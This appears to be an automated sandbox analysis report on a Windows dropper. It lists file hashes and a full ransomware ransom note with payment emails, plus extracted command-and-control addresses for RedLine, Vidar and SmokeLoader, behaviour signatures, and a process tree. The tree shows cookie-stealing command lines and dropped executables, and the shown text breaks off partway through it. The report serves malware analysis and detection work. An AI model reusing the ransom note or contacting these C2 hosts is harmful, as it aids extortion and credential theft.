Resubmissions

18-07-2021 23:15

210718-8mclhk3vee 10

18-07-2021 12:39

210718-kbyfzfwmz6 10

17-07-2021 14:35

210717-3g56vnsqx6 10

17-07-2021 03:02

210717-tl7wh7rk7a 10

17-07-2021 01:17

210717-jcjcez4sga 10

17-07-2021 01:17

210717-2sh9r7npcs 10

16-07-2021 23:01

210716-mql5d5v4ba 10

Analysis

  • max time kernel
    1801s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    17-07-2021 03:02

General

  • Target

    FD3E3 (19).exe

  • Size

    2.7MB

  • MD5

    fd3e375cbd09c6e1260ce52d3fe91b9c

  • SHA1

    59eac2602d5955b8d846fb337665bfc43934c87e

  • SHA256

    036d1b5b7a9bc9526fb0825cebe7b937ef0a8e00428a4ffc15eeb41858efc854

  • SHA512

    f9ee4e85f1f7ea23c7c51b72fa43c87bb06168856c4dfead982c64dcba3c11a5129a045c510c15fad213e808f476e7d56848d249d639bed1dd4353749e337810

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0316ewgfDdNcBG8wI6Q1WFhUNlCRyjmrWGeGew2vvCKtJgKot1
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-mNr1oio2P6

Extracted

Family

redline

Botnet

Cana

C2

176.111.174.254:56328

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 5 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 41 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 25 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 36 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 27 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    • Modifies registry class
    PID:2632
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2624
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2536
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2376
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2336
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1824
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1368
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1260
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1236
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1064
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:964
                    • C:\Users\Admin\AppData\Roaming\vfuagcw
                      C:\Users\Admin\AppData\Roaming\vfuagcw
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:4928
                      • C:\Users\Admin\AppData\Roaming\vfuagcw
                        C:\Users\Admin\AppData\Roaming\vfuagcw
                        3⤵
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4428
                    • C:\Users\Admin\AppData\Roaming\fiuagcw
                      C:\Users\Admin\AppData\Roaming\fiuagcw
                      2⤵
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2188
                    • C:\Users\Admin\AppData\Roaming\fduagcw
                      C:\Users\Admin\AppData\Roaming\fduagcw
                      2⤵
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2832
                    • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                      C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:4188
                      • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                        C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                        3⤵
                          PID:4620
                      • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                        C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:4888
                        • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                          C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                          3⤵
                            PID:3092
                        • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                          C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:1312
                          • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                            C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                            3⤵
                              PID:4388
                          • C:\Users\Admin\AppData\Roaming\fiuagcw
                            C:\Users\Admin\AppData\Roaming\fiuagcw
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:4184
                          • C:\Users\Admin\AppData\Roaming\vfuagcw
                            C:\Users\Admin\AppData\Roaming\vfuagcw
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4120
                            • C:\Users\Admin\AppData\Roaming\vfuagcw
                              C:\Users\Admin\AppData\Roaming\vfuagcw
                              3⤵
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:488
                          • C:\Users\Admin\AppData\Roaming\fduagcw
                            C:\Users\Admin\AppData\Roaming\fduagcw
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:2452
                          • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                            C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:1708
                            • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                              C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                              3⤵
                                PID:2140
                            • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                              C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:5024
                              • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                                C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                                3⤵
                                  PID:4664
                              • C:\Users\Admin\AppData\Roaming\fiuagcw
                                C:\Users\Admin\AppData\Roaming\fiuagcw
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:3676
                              • C:\Users\Admin\AppData\Roaming\vfuagcw
                                C:\Users\Admin\AppData\Roaming\vfuagcw
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:1948
                                • C:\Users\Admin\AppData\Roaming\vfuagcw
                                  C:\Users\Admin\AppData\Roaming\vfuagcw
                                  3⤵
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:236
                              • C:\Users\Admin\AppData\Roaming\fduagcw
                                C:\Users\Admin\AppData\Roaming\fduagcw
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:3464
                              • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                                C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:180
                                • C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe
                                  C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e\D9A8.exe --Task
                                  3⤵
                                    PID:3400
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:1008
                                • C:\Users\Admin\AppData\Local\Temp\FD3E3 (19).exe
                                  "C:\Users\Admin\AppData\Local\Temp\FD3E3 (19).exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1808
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:2740
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:796
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3268
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_2.exe
                                          sonia_2.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:1764
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:748
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_3.exe
                                          sonia_3.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2364
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 912
                                            6⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:440
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3568
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_4.exe
                                          sonia_4.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1552
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4680
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4484
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                              PID:1144
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              6⤵
                                                PID:3348
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sonia_6.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3080
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_6.exe
                                              sonia_6.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              PID:2352
                                              • C:\Users\Admin\Documents\1upFqtKtKC1vMRHKjrURo1Mj.exe
                                                "C:\Users\Admin\Documents\1upFqtKtKC1vMRHKjrURo1Mj.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:5104
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 5104 -s 1320
                                                  7⤵
                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                  • Program crash
                                                  PID:2664
                                              • C:\Users\Admin\Documents\50NcflVfSj8qOw8z3Xe8oUdO.exe
                                                "C:\Users\Admin\Documents\50NcflVfSj8qOw8z3Xe8oUdO.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4496
                                                • C:\Users\Admin\Documents\50NcflVfSj8qOw8z3Xe8oUdO.exe
                                                  "C:\Users\Admin\Documents\50NcflVfSj8qOw8z3Xe8oUdO.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Modifies data under HKEY_USERS
                                                  PID:4200
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 652
                                                  7⤵
                                                  • Program crash
                                                  PID:4308
                                              • C:\Users\Admin\Documents\7cEmxsMNJq4Th1NnEv65agBA.exe
                                                "C:\Users\Admin\Documents\7cEmxsMNJq4Th1NnEv65agBA.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2492
                                                • C:\Users\Admin\Documents\7cEmxsMNJq4Th1NnEv65agBA.exe
                                                  C:\Users\Admin\Documents\7cEmxsMNJq4Th1NnEv65agBA.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:3044
                                                • C:\Users\Admin\Documents\7cEmxsMNJq4Th1NnEv65agBA.exe
                                                  C:\Users\Admin\Documents\7cEmxsMNJq4Th1NnEv65agBA.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:3112
                                              • C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                "C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:3928
                                                • C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:2172
                                                • C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4264
                                                • C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:2308
                                                • C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  C:\Users\Admin\Documents\QGxZF8JJelLtk3uw4yONagmL.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:512
                                              • C:\Users\Admin\Documents\rOxKTirY53VdoFvf5vamuZt5.exe
                                                "C:\Users\Admin\Documents\rOxKTirY53VdoFvf5vamuZt5.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:4040
                                              • C:\Users\Admin\Documents\MjKwvMQmGkQkwWh5UOUjXYxs.exe
                                                "C:\Users\Admin\Documents\MjKwvMQmGkQkwWh5UOUjXYxs.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:1468
                                                • C:\Users\Admin\Documents\MjKwvMQmGkQkwWh5UOUjXYxs.exe
                                                  C:\Users\Admin\Documents\MjKwvMQmGkQkwWh5UOUjXYxs.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4856
                                              • C:\Users\Admin\Documents\RfF7mb5gndgM9nzTZVOo3XOJ.exe
                                                "C:\Users\Admin\Documents\RfF7mb5gndgM9nzTZVOo3XOJ.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4428
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  7⤵
                                                    PID:1768
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:1140
                                                • C:\Users\Admin\Documents\xKmDoHYAG6OQ6zmrTD0mAwMA.exe
                                                  "C:\Users\Admin\Documents\xKmDoHYAG6OQ6zmrTD0mAwMA.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:2452
                                                  • C:\Users\Admin\Documents\xKmDoHYAG6OQ6zmrTD0mAwMA.exe
                                                    C:\Users\Admin\Documents\xKmDoHYAG6OQ6zmrTD0mAwMA.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3624
                                                • C:\Users\Admin\Documents\JW62xTnDUrhvKhX_GIu4q4FJ.exe
                                                  "C:\Users\Admin\Documents\JW62xTnDUrhvKhX_GIu4q4FJ.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2268
                                                  • C:\Users\Admin\Documents\JW62xTnDUrhvKhX_GIu4q4FJ.exe
                                                    "C:\Users\Admin\Documents\JW62xTnDUrhvKhX_GIu4q4FJ.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:4208
                                                • C:\Users\Admin\Documents\5u2rL7beYJ8Bu4igHJvkgX0z.exe
                                                  "C:\Users\Admin\Documents\5u2rL7beYJ8Bu4igHJvkgX0z.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2260
                                                • C:\Users\Admin\Documents\Qt22SMG5Cat8tRQqq53TkIlj.exe
                                                  "C:\Users\Admin\Documents\Qt22SMG5Cat8tRQqq53TkIlj.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  PID:3824
                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4632
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:4716
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:4504
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                        PID:4912
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                          PID:792
                                                      • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4744
                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        • Drops file in Program Files directory
                                                        PID:3792
                                                      • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        • Modifies registry class
                                                        PID:4176
                                                        • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                          "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                          8⤵
                                                          • Loads dropped DLL
                                                          • Modifies registry class
                                                          PID:2676
                                                    • C:\Users\Admin\Documents\wfpo16SWzgrCTsAeFAQtg9T4.exe
                                                      "C:\Users\Admin\Documents\wfpo16SWzgrCTsAeFAQtg9T4.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4236
                                                      • C:\Users\Admin\Documents\wfpo16SWzgrCTsAeFAQtg9T4.exe
                                                        "C:\Users\Admin\Documents\wfpo16SWzgrCTsAeFAQtg9T4.exe" -a
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:3084
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3828
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_7.exe
                                                    sonia_7.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4044
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3112
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3736
                                          • \??\c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                            1⤵
                                            • Suspicious use of SetThreadContext
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3192
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                              2⤵
                                              • Drops file in System32 directory
                                              • Checks processor information in registry
                                              • Modifies data under HKEY_USERS
                                              • Modifies registry class
                                              PID:4160
                                          • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_1.exe
                                            sonia_1.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:1272
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_1.exe" -a
                                              2⤵
                                              • Executes dropped EXE
                                              PID:1840
                                          • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_5.exe
                                            sonia_5.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:4024
                                            • C:\Users\Admin\AppData\Roaming\7503394.exe
                                              "C:\Users\Admin\AppData\Roaming\7503394.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1872
                                            • C:\Users\Admin\AppData\Roaming\8088299.exe
                                              "C:\Users\Admin\AppData\Roaming\8088299.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:3156
                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4516
                                            • C:\Users\Admin\AppData\Roaming\6029489.exe
                                              "C:\Users\Admin\AppData\Roaming\6029489.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:2600
                                            • C:\Users\Admin\AppData\Roaming\1318640.exe
                                              "C:\Users\Admin\AppData\Roaming\1318640.exe"
                                              2⤵
